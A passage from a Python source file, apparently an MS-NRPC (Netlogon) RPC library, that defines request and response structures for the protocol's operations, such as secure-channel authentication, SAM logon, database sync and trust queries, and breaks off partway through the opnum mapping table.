1927 |        ('ErrorCode',NET_API_STATUS),
1928 |     )
1929 | 
1930 | # 3.5.4.3.6 DsrGetSiteName (Opnum 28)
1931 | class DsrGetSiteName(NDRCALL):
1932 |     opnum = 28
1933 |     structure = (
1934 |        ('ComputerName',PLOGONSRV_HANDLE),
1935 |     )
1936 | 
1937 | class DsrGetSiteNameResponse(NDRCALL):
1938 |     structure = (
1939 |        ('SiteName',LPWSTR),
1940 |        ('ErrorCode',NET_API_STATUS),
1941 |     )
1942 | 
1943 | # 3.5.4.3.7 DsrGetDcSiteCoverageW (Opnum 38)
1944 | class DsrGetDcSiteCoverageW(NDRCALL):
1945 |     opnum = 38
1946 |     structure = (
1947 |        ('ServerName',PLOGONSRV_HANDLE),
1948 |     )
1949 | 
1950 | class DsrGetDcSiteCoverageWResponse(NDRCALL):
1951 |     structure = (
1952 |        ('SiteNames',PNL_SITE_NAME_ARRAY),
1953 |        ('ErrorCode',NET_API_STATUS),
1954 |     )
1955 | 
1956 | # 3.5.4.3.8 DsrAddressToSiteNamesW (Opnum 33)
1957 | class DsrAddressToSiteNamesW(NDRCALL):
1958 |     opnum = 33
1959 |     structure = (
1960 |        ('ComputerName',PLOGONSRV_HANDLE),
1961 |        ('EntryCount',ULONG),
1962 |        ('SocketAddresses',NL_SOCKET_ADDRESS_ARRAY),
1963 |     )
1964 | 
1965 | class DsrAddressToSiteNamesWResponse(NDRCALL):
1966 |     structure = (
1967 |        ('SiteNames',PNL_SITE_NAME_ARRAY),
1968 |        ('ErrorCode',NET_API_STATUS),
1969 |     )
1970 | 
1971 | # 3.5.4.3.9 DsrAddressToSiteNamesExW (Opnum 37)
1972 | class DsrAddressToSiteNamesExW(NDRCALL):
1973 |     opnum = 37
1974 |     structure = (
1975 |        ('ComputerName',PLOGONSRV_HANDLE),
1976 |        ('EntryCount',ULONG),
1977 |        ('SocketAddresses',NL_SOCKET_ADDRESS_ARRAY),
1978 |     )
1979 | 
1980 | class DsrAddressToSiteNamesExWResponse(NDRCALL):
1981 |     structure = (
1982 |        ('SiteNames',PNL_SITE_NAME_EX_ARRAY),
1983 |        ('ErrorCode',NET_API_STATUS),
1984 |     )
1985 | 
1986 | # 3.5.4.3.10 DsrDeregisterDnsHostRecords (Opnum 41)
1987 | class DsrDeregisterDnsHostRecords(NDRCALL):
1988 |     opnum = 41
1989 |     structure = (
1990 |        ('ServerName',PLOGONSRV_HANDLE),
1991 |        ('DnsDomainName',LPWSTR),
1992 |        ('DomainGuid',PGUID),
1993 |        ('DsaGuid',PGUID),
1994 |        ('DnsHostName',WSTR),
1995 |     )
1996 | 
1997 | class DsrDeregisterDnsHostRecordsResponse(NDRCALL):
1998 |     structure = (
1999 |        ('ErrorCode',NET_API_STATUS),
2000 |     )
2001 | 
2002 | # 3.5.4.3.11 DSRUpdateReadOnlyServerDnsRecords (Opnum 48)
2003 | class DSRUpdateReadOnlyServerDnsRecords(NDRCALL):
2004 |     opnum = 48
2005 |     structure = (
2006 |        ('ServerName',PLOGONSRV_HANDLE),
2007 |        ('ComputerName',WSTR),
2008 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2009 |        ('SiteName',LPWSTR),
2010 |        ('DnsTtl',ULONG),
2011 |        ('DnsNames',NL_DNS_NAME_INFO_ARRAY),
2012 |     )
2013 | 
2014 | class DSRUpdateReadOnlyServerDnsRecordsResponse(NDRCALL):
2015 |     structure = (
2016 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2017 |        ('DnsNames',NL_DNS_NAME_INFO_ARRAY),
2018 |        ('ErrorCode',NTSTATUS),
2019 |     )
2020 | 
2021 | # 3.5.4.4.1 NetrServerReqChallenge (Opnum 4)
2022 | class NetrServerReqChallenge(NDRCALL):
2023 |     opnum = 4
2024 |     structure = (
2025 |        ('PrimaryName',PLOGONSRV_HANDLE),
2026 |        ('ComputerName',WSTR),
2027 |        ('ClientChallenge',NETLOGON_CREDENTIAL),
2028 |     )
2029 | 
2030 | class NetrServerReqChallengeResponse(NDRCALL):
2031 |     structure = (
2032 |        ('ServerChallenge',NETLOGON_CREDENTIAL),
2033 |        ('ErrorCode',NTSTATUS),
2034 |     )
2035 | 
2036 | # 3.5.4.4.2 NetrServerAuthenticate3 (Opnum 26)
2037 | class NetrServerAuthenticate3(NDRCALL):
2038 |     opnum = 26
2039 |     structure = (
2040 |        ('PrimaryName',PLOGONSRV_HANDLE),
2041 |        ('AccountName',WSTR),
2042 |        ('SecureChannelType',NETLOGON_SECURE_CHANNEL_TYPE),
2043 |        ('ComputerName',WSTR),
2044 |        ('ClientCredential',NETLOGON_CREDENTIAL),
2045 |        ('NegotiateFlags',ULONG),
2046 |     )
2047 | 
2048 | class NetrServerAuthenticate3Response(NDRCALL):
2049 |     structure = (
2050 |        ('ServerCredential',NETLOGON_CREDENTIAL),
2051 |        ('NegotiateFlags',ULONG),
2052 |        ('AccountRid',ULONG),
2053 |        ('ErrorCode',NTSTATUS),
2054 |     )
2055 | 
2056 | # 3.5.4.4.3 NetrServerAuthenticate2 (Opnum 15)
2057 | class NetrServerAuthenticate2(NDRCALL):
2058 |     opnum = 15
2059 |     structure = (
2060 |        ('PrimaryName',PLOGONSRV_HANDLE),
2061 |        ('AccountName',WSTR),
2062 |        ('SecureChannelType',NETLOGON_SECURE_CHANNEL_TYPE),
2063 |        ('ComputerName',WSTR),
2064 |        ('ClientCredential',NETLOGON_CREDENTIAL),
2065 |        ('NegotiateFlags',ULONG),
2066 |     )
2067 | 
2068 | class NetrServerAuthenticate2Response(NDRCALL):
2069 |     structure = (
2070 |        ('ServerCredential',NETLOGON_CREDENTIAL),
2071 |        ('NegotiateFlags',ULONG),
2072 |        ('ErrorCode',NTSTATUS),
2073 |     )
2074 | 
2075 | # 3.5.4.4.4 NetrServerAuthenticate (Opnum 5)
2076 | class NetrServerAuthenticate(NDRCALL):
2077 |     opnum = 5
2078 |     structure = (
2079 |        ('PrimaryName',PLOGONSRV_HANDLE),
2080 |        ('AccountName',WSTR),
2081 |        ('SecureChannelType',NETLOGON_SECURE_CHANNEL_TYPE),
2082 |        ('ComputerName',WSTR),
2083 |        ('ClientCredential',NETLOGON_CREDENTIAL),
2084 |     )
2085 | 
2086 | class NetrServerAuthenticateResponse(NDRCALL):
2087 |     structure = (
2088 |        ('ServerCredential',NETLOGON_CREDENTIAL),
2089 |        ('ErrorCode',NTSTATUS),
2090 |     )
2091 | 
2092 | # 3.5.4.4.5 NetrServerPasswordSet2 (Opnum 30)
2093 | class NetrServerPasswordSet2(NDRCALL):
2094 |     opnum = 30
2095 |     structure = (
2096 |        ('PrimaryName',PLOGONSRV_HANDLE),
2097 |        ('AccountName',WSTR),
2098 |        ('SecureChannelType',NETLOGON_SECURE_CHANNEL_TYPE),
2099 |        ('ComputerName',WSTR),
2100 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2101 |        ('ClearNewPassword',PNL_TRUST_PASSWORD),
2102 |     )
2103 | 
2104 | class NetrServerPasswordSet2Response(NDRCALL):
2105 |     structure = (
2106 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2107 |        ('ErrorCode',NTSTATUS),
2108 |     )
2109 | 
2110 | # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)
2111 | 
2112 | # 3.5.4.4.7 NetrServerPasswordGet (Opnum 31)
2113 | class NetrServerPasswordGet(NDRCALL):
2114 |     opnum = 31
2115 |     structure = (
2116 |        ('PrimaryName',PLOGONSRV_HANDLE),
2117 |        ('AccountName',WSTR),
2118 |        ('AccountType',NETLOGON_SECURE_CHANNEL_TYPE),
2119 |        ('ComputerName',WSTR),
2120 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2121 |     )
2122 | 
2123 | class NetrServerPasswordGetResponse(NDRCALL):
2124 |     structure = (
2125 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2126 |        ('EncryptedNtOwfPassword',ENCRYPTED_NT_OWF_PASSWORD),
2127 |        ('ErrorCode',NTSTATUS),
2128 |     )
2129 | 
2130 | # 3.5.4.4.8 NetrServerTrustPasswordsGet (Opnum 42)
2131 | class NetrServerTrustPasswordsGet(NDRCALL):
2132 |     opnum = 42
2133 |     structure = (
2134 |        ('TrustedDcName',PLOGONSRV_HANDLE),
2135 |        ('AccountName',WSTR),
2136 |        ('SecureChannelType',NETLOGON_SECURE_CHANNEL_TYPE),
2137 |        ('ComputerName',WSTR),
2138 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2139 |     )
2140 | 
2141 | class NetrServerTrustPasswordsGetResponse(NDRCALL):
2142 |     structure = (
2143 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2144 |        ('EncryptedNewOwfPassword',ENCRYPTED_NT_OWF_PASSWORD),
2145 |        ('EncryptedOldOwfPassword',ENCRYPTED_NT_OWF_PASSWORD),
2146 |        ('ErrorCode',NTSTATUS),
2147 |     )
2148 | 
2149 | # 3.5.4.4.9 NetrLogonGetDomainInfo (Opnum 29)
2150 | class NetrLogonGetDomainInfo(NDRCALL):
2151 |     opnum = 29
2152 |     structure = (
2153 |        ('ServerName',LOGONSRV_HANDLE),
2154 |        ('ComputerName',LPWSTR),
2155 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2156 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2157 |        ('Level',DWORD),
2158 |        ('WkstaBuffer',NETLOGON_WORKSTATION_INFORMATION),
2159 |     )
2160 | 
2161 | class NetrLogonGetDomainInfoResponse(NDRCALL):
2162 |     structure = (
2163 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2164 |        ('DomBuffer',NETLOGON_DOMAIN_INFORMATION),
2165 |        ('ErrorCode',NTSTATUS),
2166 |     )
2167 | 
2168 | # 3.5.4.4.10 NetrLogonGetCapabilities (Opnum 21)
2169 | class NetrLogonGetCapabilities(NDRCALL):
2170 |     opnum = 21
2171 |     structure = (
2172 |        ('ServerName',LOGONSRV_HANDLE),
2173 |        ('ComputerName',LPWSTR),
2174 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2175 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2176 |        ('QueryLevel',DWORD),
2177 |     )
2178 | 
2179 | class NetrLogonGetCapabilitiesResponse(NDRCALL):
2180 |     structure = (
2181 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2182 |        ('ServerCapabilities',NETLOGON_CAPABILITIES),
2183 |        ('ErrorCode',NTSTATUS),
2184 |     )
2185 | 
2186 | # 3.5.4.4.11 NetrChainSetClientAttributes (Opnum 49)
2187 | 
2188 | # 3.5.4.5.1 NetrLogonSamLogonEx (Opnum 39)
2189 | class NetrLogonSamLogonEx(NDRCALL):
2190 |     opnum = 39
2191 |     structure = (
2192 |        ('LogonServer',LPWSTR),
2193 |        ('ComputerName',LPWSTR),
2194 |        ('LogonLevel',NETLOGON_LOGON_INFO_CLASS),
2195 |        ('LogonInformation',NETLOGON_LEVEL),
2196 |        ('ValidationLevel',NETLOGON_VALIDATION_INFO_CLASS),
2197 |        ('ExtraFlags',ULONG),
2198 |     )
2199 | 
2200 | class NetrLogonSamLogonExResponse(NDRCALL):
2201 |     structure = (
2202 |        ('ValidationInformation',NETLOGON_VALIDATION),
2203 |        ('Authoritative',UCHAR),
2204 |        ('ExtraFlags',ULONG),
2205 |        ('ErrorCode',NTSTATUS),
2206 |     )
2207 | 
2208 | # 3.5.4.5.2 NetrLogonSamLogonWithFlags (Opnum 45)
2209 | class NetrLogonSamLogonWithFlags(NDRCALL):
2210 |     opnum = 45
2211 |     structure = (
2212 |        ('LogonServer',LPWSTR),
2213 |        ('ComputerName',LPWSTR),
2214 |        ('Authenticator',PNETLOGON_AUTHENTICATOR),
2215 |        ('ReturnAuthenticator',PNETLOGON_AUTHENTICATOR),
2216 |        ('LogonLevel',NETLOGON_LOGON_INFO_CLASS),
2217 |        ('LogonInformation',NETLOGON_LEVEL),
2218 |        ('ValidationLevel',NETLOGON_VALIDATION_INFO_CLASS),
2219 |        ('ExtraFlags',ULONG),
2220 |     )
2221 | 
2222 | class NetrLogonSamLogonWithFlagsResponse(NDRCALL):
2223 |     structure = (
2224 |        ('ReturnAuthenticator',PNETLOGON_AUTHENTICATOR),
2225 |        ('ValidationInformation',NETLOGON_VALIDATION),
2226 |        ('Authoritative',UCHAR),
2227 |        ('ExtraFlags',ULONG),
2228 |        ('ErrorCode',NTSTATUS),
2229 |     )
2230 | 
2231 | # 3.5.4.5.3 NetrLogonSamLogon (Opnum 2)
2232 | class NetrLogonSamLogon(NDRCALL):
2233 |     opnum = 2
2234 |     structure = (
2235 |        ('LogonServer',LPWSTR),
2236 |        ('ComputerName',LPWSTR),
2237 |        ('Authenticator',PNETLOGON_AUTHENTICATOR),
2238 |        ('ReturnAuthenticator',PNETLOGON_AUTHENTICATOR),
2239 |        ('LogonLevel',NETLOGON_LOGON_INFO_CLASS),
2240 |        ('LogonInformation',NETLOGON_LEVEL),
2241 |        ('ValidationLevel',NETLOGON_VALIDATION_INFO_CLASS),
2242 |     )
2243 | 
2244 | class NetrLogonSamLogonResponse(NDRCALL):
2245 |     structure = (
2246 |        ('ReturnAuthenticator',PNETLOGON_AUTHENTICATOR),
2247 |        ('ValidationInformation',NETLOGON_VALIDATION),
2248 |        ('Authoritative',UCHAR),
2249 |        ('ErrorCode',NTSTATUS),
2250 |     )
2251 | 
2252 | # 3.5.4.5.4 NetrLogonSamLogoff (Opnum 3)
2253 | class NetrLogonSamLogoff(NDRCALL):
2254 |     opnum = 3
2255 |     structure = (
2256 |        ('LogonServer',LPWSTR),
2257 |        ('ComputerName',LPWSTR),
2258 |        ('Authenticator',PNETLOGON_AUTHENTICATOR),
2259 |        ('ReturnAuthenticator',PNETLOGON_AUTHENTICATOR),
2260 |        ('LogonLevel',NETLOGON_LOGON_INFO_CLASS),
2261 |        ('LogonInformation',NETLOGON_LEVEL),
2262 |     )
2263 | 
2264 | class NetrLogonSamLogoffResponse(NDRCALL):
2265 |     structure = (
2266 |        ('ReturnAuthenticator',PNETLOGON_AUTHENTICATOR),
2267 |        ('ErrorCode',NTSTATUS),
2268 |     )
2269 | 
2270 | # 3.5.4.6.1 NetrDatabaseDeltas (Opnum 7)
2271 | class NetrDatabaseDeltas(NDRCALL):
2272 |     opnum = 7
2273 |     structure = (
2274 |        ('PrimaryName',LOGONSRV_HANDLE),
2275 |        ('ComputerName',WSTR),
2276 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2277 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2278 |        ('DatabaseID',DWORD),
2279 |        ('DomainModifiedCount',NLPR_MODIFIED_COUNT),
2280 |        ('PreferredMaximumLength',DWORD),
2281 |     )
2282 | 
2283 | class NetrDatabaseDeltasResponse(NDRCALL):
2284 |     structure = (
2285 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2286 |        ('DomainModifiedCount',NLPR_MODIFIED_COUNT),
2287 |        ('DeltaArray',PNETLOGON_DELTA_ENUM_ARRAY),
2288 |        ('ErrorCode',NTSTATUS),
2289 |     )
2290 | 
2291 | # 3.5.4.6.2 NetrDatabaseSync2 (Opnum 16)
2292 | class NetrDatabaseSync2(NDRCALL):
2293 |     opnum = 16
2294 |     structure = (
2295 |        ('PrimaryName',LOGONSRV_HANDLE),
2296 |        ('ComputerName',WSTR),
2297 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2298 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2299 |        ('DatabaseID',DWORD),
2300 |        ('RestartState',SYNC_STATE),
2301 |        ('SyncContext',ULONG),
2302 |        ('PreferredMaximumLength',DWORD),
2303 |     )
2304 | 
2305 | class NetrDatabaseSync2Response(NDRCALL):
2306 |     structure = (
2307 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2308 |        ('SyncContext',ULONG),
2309 |        ('DeltaArray',PNETLOGON_DELTA_ENUM_ARRAY),
2310 |        ('ErrorCode',NTSTATUS),
2311 |     )
2312 | 
2313 | # 3.5.4.6.3 NetrDatabaseSync (Opnum 8)
2314 | class NetrDatabaseSync(NDRCALL):
2315 |     opnum = 8
2316 |     structure = (
2317 |        ('PrimaryName',LOGONSRV_HANDLE),
2318 |        ('ComputerName',WSTR),
2319 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2320 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2321 |        ('DatabaseID',DWORD),
2322 |        ('SyncContext',ULONG),
2323 |        ('PreferredMaximumLength',DWORD),
2324 |     )
2325 | 
2326 | class NetrDatabaseSyncResponse(NDRCALL):
2327 |     structure = (
2328 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2329 |        ('SyncContext',ULONG),
2330 |        ('DeltaArray',PNETLOGON_DELTA_ENUM_ARRAY),
2331 |        ('ErrorCode',NTSTATUS),
2332 |     )
2333 | 
2334 | # 3.5.4.6.4 NetrDatabaseRedo (Opnum 17)
2335 | class NetrDatabaseRedo(NDRCALL):
2336 |     opnum = 17
2337 |     structure = (
2338 |        ('PrimaryName',LOGONSRV_HANDLE),
2339 |        ('ComputerName',WSTR),
2340 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2341 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2342 |        ('ChangeLogEntry',PUCHAR_ARRAY),
2343 |        ('ChangeLogEntrySize',DWORD),
2344 |     )
2345 | 
2346 | class NetrDatabaseRedoResponse(NDRCALL):
2347 |     structure = (
2348 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2349 |        ('DeltaArray',PNETLOGON_DELTA_ENUM_ARRAY),
2350 |        ('ErrorCode',NTSTATUS),
2351 |     )
2352 | 
2353 | # 3.5.4.7.1 DsrEnumerateDomainTrusts (Opnum 40)
2354 | class DsrEnumerateDomainTrusts(NDRCALL):
2355 |     opnum = 40
2356 |     structure = (
2357 |        ('ServerName',PLOGONSRV_HANDLE),
2358 |        ('Flags',ULONG),
2359 |     )
2360 | 
2361 | class DsrEnumerateDomainTrustsResponse(NDRCALL):
2362 |     structure = (
2363 |        ('Domains',NETLOGON_TRUSTED_DOMAIN_ARRAY),
2364 |        ('ErrorCode',NTSTATUS),
2365 |     )
2366 | 
2367 | # 3.5.4.7.2 NetrEnumerateTrustedDomainsEx (Opnum 36)
2368 | class NetrEnumerateTrustedDomainsEx(NDRCALL):
2369 |     opnum = 36
2370 |     structure = (
2371 |        ('ServerName',PLOGONSRV_HANDLE),
2372 |     )
2373 | 
2374 | class NetrEnumerateTrustedDomainsExResponse(NDRCALL):
2375 |     structure = (
2376 |        ('Domains',NETLOGON_TRUSTED_DOMAIN_ARRAY),
2377 |        ('ErrorCode',NTSTATUS),
2378 |     )
2379 | 
2380 | # 3.5.4.7.3 NetrEnumerateTrustedDomains (Opnum 19)
2381 | class NetrEnumerateTrustedDomains(NDRCALL):
2382 |     opnum = 19
2383 |     structure = (
2384 |        ('ServerName',PLOGONSRV_HANDLE),
2385 |     )
2386 | 
2387 | class NetrEnumerateTrustedDomainsResponse(NDRCALL):
2388 |     structure = (
2389 |        ('DomainNameBuffer',DOMAIN_NAME_BUFFER),
2390 |        ('ErrorCode',NTSTATUS),
2391 |     )
2392 | 
2393 | # 3.5.4.7.4 NetrGetForestTrustInformation (Opnum 44)
2394 | class NetrGetForestTrustInformation(NDRCALL):
2395 |     opnum = 44
2396 |     structure = (
2397 |        ('ServerName',PLOGONSRV_HANDLE),
2398 |        ('ComputerName',WSTR),
2399 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2400 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2401 |        ('Flags',DWORD),
2402 |     )
2403 | 
2404 | class NetrGetForestTrustInformationResponse(NDRCALL):
2405 |     structure = (
2406 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2407 |        ('ForestTrustInfo',PLSA_FOREST_TRUST_INFORMATION),
2408 |        ('ErrorCode',NTSTATUS),
2409 |     )
2410 | 
2411 | # 3.5.4.7.5 DsrGetForestTrustInformation (Opnum 43)
2412 | class DsrGetForestTrustInformation(NDRCALL):
2413 |     opnum = 43
2414 |     structure = (
2415 |        ('ServerName',PLOGONSRV_HANDLE),
2416 |        ('TrustedDomainName',LPWSTR),
2417 |        ('Flags',DWORD),
2418 |     )
2419 | 
2420 | class DsrGetForestTrustInformationResponse(NDRCALL):
2421 |     structure = (
2422 |        ('ForestTrustInfo',PLSA_FOREST_TRUST_INFORMATION),
2423 |        ('ErrorCode',NTSTATUS),
2424 |     )
2425 | 
2426 | # 3.5.4.7.6 NetrServerGetTrustInfo (Opnum 46)
2427 | class NetrServerGetTrustInfo(NDRCALL):
2428 |     opnum = 46
2429 |     structure = (
2430 |        ('TrustedDcName',PLOGONSRV_HANDLE),
2431 |        ('AccountName',WSTR),
2432 |        ('SecureChannelType',NETLOGON_SECURE_CHANNEL_TYPE),
2433 |        ('ComputerName',WSTR),
2434 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2435 |     )
2436 | 
2437 | class NetrServerGetTrustInfoResponse(NDRCALL):
2438 |     structure = (
2439 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2440 |        ('EncryptedNewOwfPassword',ENCRYPTED_NT_OWF_PASSWORD),
2441 |        ('EncryptedOldOwfPassword',ENCRYPTED_NT_OWF_PASSWORD),
2442 |        ('TrustInfo',PNL_GENERIC_RPC_DATA),
2443 |        ('ErrorCode',NTSTATUS),
2444 |     )
2445 | 
2446 | # 3.5.4.8.1 NetrLogonGetTrustRid (Opnum 23)
2447 | class NetrLogonGetTrustRid(NDRCALL):
2448 |     opnum = 23
2449 |     structure = (
2450 |        ('ServerName',PLOGONSRV_HANDLE),
2451 |        ('DomainName',LPWSTR),
2452 |     )
2453 | 
2454 | class NetrLogonGetTrustRidResponse(NDRCALL):
2455 |     structure = (
2456 |        ('Rid',ULONG),
2457 |        ('ErrorCode',NTSTATUS),
2458 |     )
2459 | 
2460 | # 3.5.4.8.2 NetrLogonComputeServerDigest (Opnum 24)
2461 | class NetrLogonComputeServerDigest(NDRCALL):
2462 |     opnum = 24
2463 |     structure = (
2464 |        ('ServerName',PLOGONSRV_HANDLE),
2465 |        ('Rid',ULONG),
2466 |        ('Message',UCHAR_ARRAY),
2467 |        ('MessageSize',ULONG),
2468 |     )
2469 | 
2470 | class NetrLogonComputeServerDigestResponse(NDRCALL):
2471 |     structure = (
2472 |        ('NewMessageDigest',CHAR_FIXED_16_ARRAY),
2473 |        ('OldMessageDigest',CHAR_FIXED_16_ARRAY),
2474 |        ('ErrorCode',NTSTATUS),
2475 |     )
2476 | 
2477 | # 3.5.4.8.3 NetrLogonComputeClientDigest (Opnum 25)
2478 | class NetrLogonComputeClientDigest(NDRCALL):
2479 |     opnum = 25
2480 |     structure = (
2481 |        ('ServerName',PLOGONSRV_HANDLE),
2482 |        ('DomainName',LPWSTR),
2483 |        ('Message',UCHAR_ARRAY),
2484 |        ('MessageSize',ULONG),
2485 |     )
2486 | 
2487 | class NetrLogonComputeClientDigestResponse(NDRCALL):
2488 |     structure = (
2489 |        ('NewMessageDigest',CHAR_FIXED_16_ARRAY),
2490 |        ('OldMessageDigest',CHAR_FIXED_16_ARRAY),
2491 |        ('ErrorCode',NTSTATUS),
2492 |     )
2493 | 
2494 | # 3.5.4.8.4 NetrLogonSendToSam (Opnum 32)
2495 | class NetrLogonSendToSam(NDRCALL):
2496 |     opnum = 32
2497 |     structure = (
2498 |        ('PrimaryName',PLOGONSRV_HANDLE),
2499 |        ('ComputerName',WSTR),
2500 |        ('Authenticator',NETLOGON_AUTHENTICATOR),
2501 |        ('OpaqueBuffer',UCHAR_ARRAY),
2502 |        ('OpaqueBufferSize',ULONG),
2503 |     )
2504 | 
2505 | class NetrLogonSendToSamResponse(NDRCALL):
2506 |     structure = (
2507 |        ('ReturnAuthenticator',NETLOGON_AUTHENTICATOR),
2508 |        ('ErrorCode',NTSTATUS),
2509 |     )
2510 | 
2511 | # 3.5.4.8.5 NetrLogonSetServiceBits (Opnum 22)
2512 | class NetrLogonSetServiceBits(NDRCALL):
2513 |     opnum = 22
2514 |     structure = (
2515 |        ('ServerName',PLOGONSRV_HANDLE),
2516 |        ('ServiceBitsOfInterest',DWORD),
2517 |        ('ServiceBits',DWORD),
2518 |     )
2519 | 
2520 | class NetrLogonSetServiceBitsResponse(NDRCALL):
2521 |     structure = (
2522 |        ('ErrorCode',NTSTATUS),
2523 |     )
2524 | 
2525 | # 3.5.4.8.6 NetrLogonGetTimeServiceParentDomain (Opnum 35)
2526 | class NetrLogonGetTimeServiceParentDomain(NDRCALL):
2527 |     opnum = 35
2528 |     structure = (
2529 |        ('ServerName',PLOGONSRV_HANDLE),
2530 |     )
2531 | 
2532 | class NetrLogonGetTimeServiceParentDomainResponse(NDRCALL):
2533 |     structure = (
2534 |        ('DomainName',LPWSTR),
2535 |        ('PdcSameSite',LONG),
2536 |        ('ErrorCode',NET_API_STATUS),
2537 |     )
2538 | 
2539 | # 3.5.4.9.1 NetrLogonControl2Ex (Opnum 18)
2540 | class NetrLogonControl2Ex(NDRCALL):
2541 |     opnum = 18
2542 |     structure = (
2543 |        ('ServerName',PLOGONSRV_HANDLE),
2544 |        ('FunctionCode',DWORD),
2545 |        ('QueryLevel',DWORD),
2546 |        ('Data',NETLOGON_CONTROL_DATA_INFORMATION),
2547 |     )
2548 | 
2549 | class NetrLogonControl2ExResponse(NDRCALL):
2550 |     structure = (
2551 |        ('Buffer',NETLOGON_CONTROL_DATA_INFORMATION),
2552 |        ('ErrorCode',NET_API_STATUS),
2553 |     )
2554 | 
2555 | # 3.5.4.9.2 NetrLogonControl2 (Opnum 14)
2556 | class NetrLogonControl2(NDRCALL):
2557 |     opnum = 14
2558 |     structure = (
2559 |        ('ServerName',PLOGONSRV_HANDLE),
2560 |        ('FunctionCode',DWORD),
2561 |        ('QueryLevel',DWORD),
2562 |        ('Data',NETLOGON_CONTROL_DATA_INFORMATION),
2563 |     )
2564 | 
2565 | class NetrLogonControl2Response(NDRCALL):
2566 |     structure = (
2567 |        ('Buffer',NETLOGON_CONTROL_DATA_INFORMATION),
2568 |        ('ErrorCode',NET_API_STATUS),
2569 |     )
2570 | 
2571 | # 3.5.4.9.3 NetrLogonControl (Opnum 12)
2572 | class NetrLogonControl(NDRCALL):
2573 |     opnum = 12
2574 |     structure = (
2575 |        ('ServerName',PLOGONSRV_HANDLE),
2576 |        ('FunctionCode',DWORD),
2577 |        ('QueryLevel',DWORD),
2578 |        ('Data',NETLOGON_CONTROL_DATA_INFORMATION),
2579 |     )
2580 | 
2581 | class NetrLogonControlResponse(NDRCALL):
2582 |     structure = (
2583 |        ('Buffer',NETLOGON_CONTROL_DATA_INFORMATION),
2584 |        ('ErrorCode',NET_API_STATUS),
2585 |     )
2586 | 
2587 | # 3.5.4.10.1 NetrLogonUasLogon (Opnum 0)
2588 | class NetrLogonUasLogon(NDRCALL):
2589 |     opnum = 0
2590 |     structure = (
2591 |        ('ServerName',PLOGONSRV_HANDLE),
2592 |        ('UserName',WSTR),
2593 |        ('Workstation',WSTR),
2594 |     )
2595 | 
2596 | class NetrLogonUasLogonResponse(NDRCALL):
2597 |     structure = (
2598 |        ('ValidationInformation',PNETLOGON_VALIDATION_UAS_INFO),
2599 |        ('ErrorCode',NET_API_STATUS),
2600 |     )
2601 | 
2602 | # 3.5.4.10.2 NetrLogonUasLogoff (Opnum 1)
2603 | class NetrLogonUasLogoff(NDRCALL):
2604 |     opnum = 1
2605 |     structure = (
2606 |        ('ServerName',PLOGONSRV_HANDLE),
2607 |        ('UserName',WSTR),
2608 |        ('Workstation',WSTR),
2609 |     )
2610 | 
2611 | class NetrLogonUasLogoffResponse(NDRCALL):
2612 |     structure = (
2613 |        ('LogoffInformation',NETLOGON_LOGOFF_UAS_INFO),
2614 |        ('ErrorCode',NET_API_STATUS),
2615 |     )
2616 | 
2617 | ################################################################################
2618 | # OPNUMs and their corresponding structures
2619 | ################################################################################
2620 | OPNUMS = {
2621 |  0 : (NetrLogonUasLogon, NetrLogonUasLogonResponse),
2622 |  1 : (NetrLogonUasLogoff, NetrLogonUasLogoffResponse),
2623 |  2 : (NetrLogonSamLogon, NetrLogonSamLogonResponse),
2624 |  3 : (NetrLogonSamLogoff, NetrLogonSamLogoffResponse),
2625 |  4 : (NetrServerReqChallenge, NetrServerReqChallengeResponse),
2626 |  5 : (NetrServerAuthenticate, NetrServerAuthenticateResponse),
2627 | # 6 : (NetrServerPasswordSet, NetrServerPasswordSetResponse),
2628 |  7 : (NetrDatabaseDeltas, NetrDatabaseDeltasResponse),
2629 |  8 : (NetrDatabaseSync, NetrDatabaseSyncResponse),
2630 | # 9 : (NetrAccountDeltas, NetrAccountDeltasResponse),
2631 | # 10 : (NetrAccountSync, NetrAccountSyncResponse),
2632 |  11 : (NetrGetDCName, NetrGetDCNameResponse),
2633 |  12 : (NetrLogonControl, NetrLogonControlResponse),
2634 |  13 : (NetrGetAnyDCName, NetrGetAnyDCNameResponse),
2635 |  14 : (NetrLogonControl2, NetrLogonControl2Response),
2636 |  15 : (NetrServerAuthenticate2, NetrServerAuthenticate2Response),
2637 |  16 : (NetrDatabaseSync2, NetrDatabaseSync2Response),
2638 |  17 : (NetrDatabaseRedo, NetrDatabaseRedoResponse),
2639 |  18 : (NetrLogonControl2Ex, NetrLogonControl2ExResponse),
2640 |  19 : (NetrEnumerateTrustedDomains, NetrEnumerateTrustedDomainsResponse),
2641 |  20 : (DsrGetDcName, DsrGetDcNameResponse),
2642 |  21 : (NetrLogonGetCapabilities, NetrLogonGetCapabilitiesResponse),
